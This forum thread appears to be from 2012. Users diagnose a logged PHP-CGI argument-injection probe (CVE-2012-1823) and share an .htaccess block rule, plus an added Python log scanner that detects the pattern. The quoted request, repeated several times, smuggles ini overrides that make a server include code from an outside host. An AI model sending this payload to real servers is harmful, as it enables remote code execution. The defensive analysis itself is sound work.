  1. #1
    New to the CF scene
    Join Date
    Jun 2012
    Posts
    4
    Thanks
    1
    Thanked 0 Times in 0 Posts

    attack or webcrawler?

    209.135.33.180 - - [09/Jun/2012:07:45:11 -0400] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.144/sites/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.144/sites/api.gif%20-n HTTP/1.1" 200 4129



    What is the nature of this request?

  • #2
    New Coder
    Join Date
    Nov 2011
    Posts
    88
    Thanks
    4
    Thanked 26 Times in 26 Posts
    Why would a legitimate crawler POST?

    Looks like a bot testing for file inclusion vulnerabilities by linking to a gif on a Spanish server.

    Code:
    /?-d allow_url_include=On+-d auto_prepend_file=http://84.20.17.144/sites/api.gif -n/?-d allow_url_include=On+-d auto_prepend_file=http://84.20.17.144/sites/api.gif -n
    Last edited by leslie.jones; 06-10-2012 at 12:47 PM. Reason: typo

  • #3
    New to the CF scene
    Join Date
    Jul 2012
    Posts
    7
    Thanks
    1
    Thanked 2 Times in 2 Posts
    I have also seen this in my access log file on my private webserver, except the originating IP address was 174.123.131.34, apparently coming from a web account hosted by theplanet.com. I wonder if anyone else has seen this as well?

  • #4
    New Coder
    Join Date
    Nov 2011
    Posts
    88
    Thanks
    4
    Thanked 26 Times in 26 Posts
    It appears to relate to this PHP bug/vuln:

    http://eindbazen.net/2012/05/php-cgi...cve-2012-1823/

    This article

    http://blog.sucuri.net/2012/05/php-c...-the-wild.html

    suggests that:

    The PHP guys are recommending the following .htaccess hack to block those attacks:

    Code:
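        RewriteEngine on
        # Query string contains no literal "=" ...
        RewriteCond %{QUERY_STRING} ^[^=]*$
        # ... and contains a hyphen, raw or percent-encoded
        RewriteCond %{QUERY_STRING} %2d|\- [NC]
        # Refuse the request with 403 Forbidden
        RewriteRule .? - [F,L]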
    If you don't use PHP-CGI, it's a non-issue and part of the usual trash of reconnaissance a sysadmin gets to see in the logs.
    Last edited by leslie.jones; 07-09-2012 at 11:53 AM.

  • Users who have thanked leslie.jones for this post:

    kerigan (07-13-2012)
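
Added example (not from the thread or the linked articles): a small Python scanner that applies the same two tests as the rewrite rule in post #4 to access-log lines and decodes any `-d` overrides they carry. The function names and the 192.0.2.x entries are constructed for illustration; the first sample entry is the request quoted in post #1.

```python
import re
from urllib.parse import unquote_plus

# Common/combined log format: client IP first, then the quoted request line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# "-d name=value" is the php-cgi switch the logged request tries to pass.
DIRECTIVE_RE = re.compile(r'-d\s+([\w.]+)=(\S+)')

def rule_would_block(query):
    """Mirror the two RewriteCond tests on the raw (undecoded) query string."""
    no_literal_equals = re.fullmatch(r'[^=]*', query) is not None
    has_hyphen = re.search(r'%2d|-', query, re.IGNORECASE) is not None
    return no_literal_equals and has_hyphen

def injected_directives(query):
    """Decode the query and list the unique ini overrides carried by -d switches."""
    decoded = unquote_plus(query)
    return list(dict.fromkeys(DIRECTIVE_RE.findall(decoded)))

def scan(lines):
    """Return (ip, blocked_by_rule, directives) for every parseable log line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = m.group("target").partition("?")[2]
        findings.append((m.group("ip"), rule_would_block(query), injected_directives(query)))
    return findings

SAMPLE_LOG = [
    # First entry is the request quoted in post #1; the rest are constructed.
    '209.135.33.180 - - [09/Jun/2012:07:45:11 -0400] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.144/sites/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.144/sites/api.gif%20-n HTTP/1.1" 200 4129',
    '192.0.2.10 - - [09/Jun/2012:07:46:02 -0400] "GET /index.php?page=about-us HTTP/1.1" 200 5120',
    '192.0.2.11 - - [09/Jun/2012:07:46:40 -0400] "GET /docs?getting-started HTTP/1.1" 200 2210',
    '192.0.2.12 - - [09/Jun/2012:07:47:05 -0400] "GET /robots.txt HTTP/1.1" 200 68',
]

if __name__ == "__main__":
    for ip, blocked, directives in scan(SAMPLE_LOG):
        print(ip, "blocked" if blocked else "passed", directives)
```

The third sample line shows that the rule also rejects an ordinary query with no `=` that merely contains a hyphen, so check your own URLs for that pattern before deploying it.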

  • #5
    New to the CF scene
    Join Date
    Jul 2012
    Posts
    7
    Thanks
    1
    Thanked 2 Times in 2 Posts
    Thank you for the information. I wasn't aware of this bug.

